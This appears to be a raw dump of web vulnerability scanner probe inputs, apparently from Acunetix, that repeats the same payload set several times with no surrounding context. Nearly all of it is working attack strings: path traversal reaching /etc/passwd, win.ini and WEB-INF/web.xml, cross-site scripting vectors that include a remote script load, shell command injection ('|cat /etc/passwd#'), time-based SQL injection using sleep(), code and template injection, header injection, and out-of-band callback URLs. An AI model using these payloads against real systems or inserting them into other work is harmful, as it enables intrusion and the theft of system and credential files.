../../../../../../../../../../etc/passwd.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986547)>

1

1

-1))

${99875+99363}

1

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(967131)>

1

iamKMMPw'

1

1

1&n914565=v949946

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(934236)>

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

1

1

1

ECOh0Hbc')

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(942824)</sCripT>

'|'ld

1

'"()

apzDvvpd'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

!(()&&!|*|*|

testasp.vulnweb.com

1

"|"ld

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

1

'

1

^(#$!@#$)(()))******

/etc/passwd

1

\xf6<img acu onmouseover=prompt(972761) //\xf6>

1

-1)

1

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitxUboNZG9Wt.bxss.me/

1

-1))

1

1<input autofocus onfocus=prompt(996939)>

'

1

CKZrXS4o'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

1

U3xADRM3')

1

1

<a href='http://www.acunetix.com'>website security</a>

"

pHPwE07v'))

1

comments

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

1

http://www.acunetix.tst

[url=http://www.acunetix.com]website security[/url]

1

1

comments

1

1

&dir

1

comments/.

'"

1_3bPSX <ScRiPt >prompt(971553)</ScRiPt>

file:///etc/passwd

1

1

'&dir&'

1

1'"()&%<ScRiPt >prompt(971278)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(913616)</ScRiPt>

1

"&dir&"

1

1

1

1

1

1

|dir

WEB-INF\web.xml

1_955241

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1

acu2568\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2568

1

../../../../../../../../../../boot.ini

"|dir

acux5989\xc0\xbez1\xc0\xbcz2a\x90bcxuca5989

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(967822)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(939242)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(905614)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908538></ScRiPt>

1

1

1

1<ScRiPt >prompt(944141)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(976528)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901408)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(981917))>

1

response.write(9791391*9533571)

1

1

1

&cat /etc/passwd&

'+response.write(9791391*9533571)+'

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

"+response.write(9791391*9533571)+"

'&cat /etc/passwd&'

WEB-INF/web.xml

1<body onload=prompt(959397)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(967855)>

WEB-INF\web.xml

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(913112)>

1

1

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img/src=">" onerror=alert(968099)>

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99858+100213}

1

-1)

1

1<ScRiPt%20>prompt(964013)</sCripT>

1

|cat /etc/passwd#

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1&lt

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&n972787=v946939

'|'ld

QP0sVAUp'

1some_inexistent_file_with_long_name%00.jpg

\xf6<img acu onmouseover=prompt(922605) //\xf6>

1

!(()&&!|*|*|

'"()

1

1

/etc/passwd

"|"ld

HSqmBpqF')

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(951918)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

I4RywAYo'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

-1

1

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

testasp.vulnweb.com

1

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

1

1

1_oFnlj <ScRiPt >prompt(961353)</ScRiPt>

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

http://hithIiwhLsNOd.bxss.me/

1

1

VInS3JF8'

${@print(md5(acunetix_wvs_security_test))}\

1

1

&dir

file:///etc/passwd

1

comments

1

1

1

0u3Xi5no')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

vfFoCgoN'))

1

http://www.acunetix.tst

'"

1

"&dir&"

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(950344)</ScRiPt>

comments/.

1

<!--

1

1

|dir

'"()&%<ScRiPt >prompt(996244)</ScRiPt>

1

WEB-INF\web.xml

1

1

1

1

1

'|dir

1_902582

../../../../../../../../../../windows/win.ini

1

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu3765\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3765

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

acux5815\xc0\xbez1\xc0\xbcz2a\x90bcxuca5815

1

................windowswin.ini

1<ScRiPt >prompt(981938)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(932530)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(945562)</ScRiPt>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?922674></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(988868)</ScRiPt>

1

1<video><source onerror="javascript:prompt(914628)">

WEB-INF/web.xml

1

response.write(9373395*9037409)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(996147)"></g></svg>

1

WEB-INF\web.xml

1

1

'+response.write(9373395*9037409)+'

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(907595))>

1

'&cat /etc/passwd&'

"+response.write(9373395*9037409)+"

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<body onload=prompt(990122)>

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934064)>

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

1

1<img src=xyz OnErRor=prompt(951602)>

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100140+100101}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1<img/src=">" onerror=alert(971602)>

1

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

-1))

)

1

1

1&n921834=v957307

1<ScRiPt%20>prompt(987237)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

IfsZsahp'

/etc/passwd

1&lt

1

1

1

^(#$!@#$)(()))******

D5Aqd2Wi')

testasp.vulnweb.com

'"()

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

\xf6<img acu onmouseover=prompt(948673) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

wtUlOwnF'))

'

1

'

1

1<input autofocus onfocus=prompt(960962)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

"

"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

-1)

1

http://hit0zQoBwkY26.bxss.me/

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

-1))

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

&dir

http://www.acunetix.tst

comments

1_voq4f <ScRiPt >prompt(972999)</ScRiPt>

IwjqeD7V'

1

/\../\../\../\../\../\../\../etc/passwd

1

'&dir&'

'"

comments

1

kOf85gOg')

1

1'"()&%<ScRiPt >prompt(929916)</ScRiPt>

1

1

WEB-INF/web.xml

<!--

comments/.

"&dir&"

nqV4wXqm'))

1

'"()&%<ScRiPt >prompt(948437)</ScRiPt>

1

1

|dir

WEB-INF\web.xml

1

1

1

1

1_934364

1

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

acu7755\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7755

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux5046\xc0\xbez1\xc0\xbcz2a\x90bcxuca5046

1

1

1

1<ScRiPt >prompt(996055)</ScRiPt>

................windowswin.ini

1

1

1<script>prompt(935895)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(993262)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985434></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(968516)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(959649)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934681)"></g></svg>

1

response.write(9769676*9959750)

1

1

1

WEB-INF/web.xml

'+response.write(9769676*9959750)+'

1<div style=width:expression(prompt(967733))>

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

"+response.write(9769676*9959750)+"

1

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(987354)>

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973854)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

cat /etc/passwd

-1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(954640)>

1

1

1

`cat /etc/passwd`

1

-1)

1&n910580=v908389

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(905237)>

1

${100424+99576}

1

|cat /etc/passwd#

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<ScRiPt%20>prompt(996744)</sCripT>

1

1some_inexistent_file_with_long_name%00.jpg

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

o2HT9gE0'

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1&lt

myJYMPQX')

"|"ld

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

1

\xf6<img acu onmouseover=prompt(928876) //\xf6>

^(#$!@#$)(()))******

testasp.vulnweb.com

s9O8UPB2'))

1

1

/etc/passwd

"

1

'

1

-1

1

1<input autofocus onfocus=prompt(963098)>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

-1)

1

"

<a href='http://www.acunetix.com'>website security</a>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

1

-1))

||cat /etc/passwd

http://hitQSiy7yRUZx.bxss.me/

1

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_Bqs8B <ScRiPt >prompt(907981)</ScRiPt>

1

1

&dir

YPpCwRDA'

1

comments

1

1

1

'&dir&'

kyCUOOXR')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

file:///etc/passwd

1

comments

1

"&dir&"

yaxonETe'))

1

1

1

1

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1'"()&%<ScRiPt >prompt(989287)</ScRiPt>

1

'"

1

'|dir

1

1

WEB-INF/web.xml

1

<!--

'"()&%<ScRiPt >prompt(961498)</ScRiPt>

WEB-INF\web.xml

1

"|dir

1

1_955704

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

acu9550\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9550

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux3540\xc0\xbez1\xc0\xbcz2a\x90bcxuca3540

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1<ScRiPt >prompt(946606)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(944555)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(927131)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968057></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(994181)</ScRiPt>

1

response.write(9996070*9054982)

1<video><source onerror="javascript:prompt(945721)">

1

'+response.write(9996070*9054982)+'

1

1

&cat /etc/passwd&

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(912472)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9996070*9054982)+"

'&cat /etc/passwd&'

1

1<div style=width:expression(prompt(978149))>

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<body onload=prompt(934078)>

1

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99023+99137}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(976824)>

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<img src=xyz OnErRor=prompt(902735)>

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

|cat /etc/passwd#

1&n993967=v924372

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

-1)

1<img/src=">" onerror=alert(966952)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<ScRiPt%20>prompt(973916)</sCripT>

-1))

"|"ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

1

1

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

Ji1i0hwK'

1

1

1

'

\xf6<img acu onmouseover=prompt(911717) //\xf6>

1

1

1

/etc/passwd

7dOGCwbj')

1

1

"

1

'

1<input autofocus onfocus=prompt(903845)>

1

acunetix_wvs_invalid_filename

Tz8HgnTJ'))

http://hitWHeWQliqzm.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

comments

1

<a href='http://www.acunetix.com'>website security</a>

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1

comments

1

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

-1)

1

comments/.

1

'"

1_svndf <ScRiPt >prompt(900099)</ScRiPt>

1

-1))

1

'&dir&'

1

1

1

U4HR8Yv9'

<!--

1'"()&%<ScRiPt >prompt(967707)</ScRiPt>

1

file:///etc/passwd

1

"&dir&"

1

1

1

1

'"()&%<ScRiPt >prompt(972880)</ScRiPt>

euUzkSF4')

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1_938835

1

1

LAVI6xxN'))

'|dir

WEB-INF/web.xml

1

1

"|dir

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

acu7440\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7440

1

1

../../../../../../../../../../boot.ini

acux9156\xc0\xbez1\xc0\xbcz2a\x90bcxuca9156

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(979907)</ScRiPt>

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(925134)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(919167)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938988></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(944205)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(905330)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9870868*9319374)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911309)"></g></svg>

1

&cat /etc/passwd&

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'&cat /etc/passwd&'

1<div style=width:expression(prompt(981457))>

'+response.write(9870868*9319374)+'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1<iframe src='data:text/html

"+response.write(9870868*9319374)+"

1

cat /etc/passwd

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(923075)>

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970959)>

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

|cat /etc/passwd#

1

${99344+99268}

../../../../../../../../../../etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(927355)>

1

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1

1&n952744=v987900

1<img/src=">" onerror=alert(979526)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<ScRiPt%20>prompt(995324)</sCripT>

1

1

IDHpKh6F'

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

1

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

'

^(#$!@#$)(()))******

CUF72BrD')

1

'

1

\xf6<img acu onmouseover=prompt(963164) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

QenjJGC9'))

1

1

"

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1<input autofocus onfocus=prompt(909543)>

-1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

<a href='http://www.acunetix.com'>website security</a>

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitd9OFdaYrdJ.bxss.me/

||cat /etc/passwd

-1))

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

1

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

YXXbnPty'

&dir

1

1_iNmWn <ScRiPt >prompt(932216)</ScRiPt>

1

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

LnXLGBOZ')

comments

http://www.acunetix.tst

1

1

1

1

file:///etc/passwd

B1sScILO'))

"&dir&"

1

comments/.

1

1

1

'"

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1'"()&%<ScRiPt >prompt(971518)</ScRiPt>

1

1

WEB-INF/web.xml

1

<!--

1

1

'"()&%<ScRiPt >prompt(947553)</ScRiPt>

'|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1_943095

1

1

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu6361\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6361

1

1

1

acux7165\xc0\xbez1\xc0\xbcz2a\x90bcxuca7165

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(965280)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(969051)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(912578)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953390></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(926960)</ScRiPt>

response.write(9750167*9173331)

1<video><source onerror="javascript:prompt(945126)">

1

1

1

'+response.write(9750167*9173331)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948175)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

"+response.write(9750167*9173331)+"

1

1<div style=width:expression(prompt(970971))>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

WEB-INF/web.xml

1

1

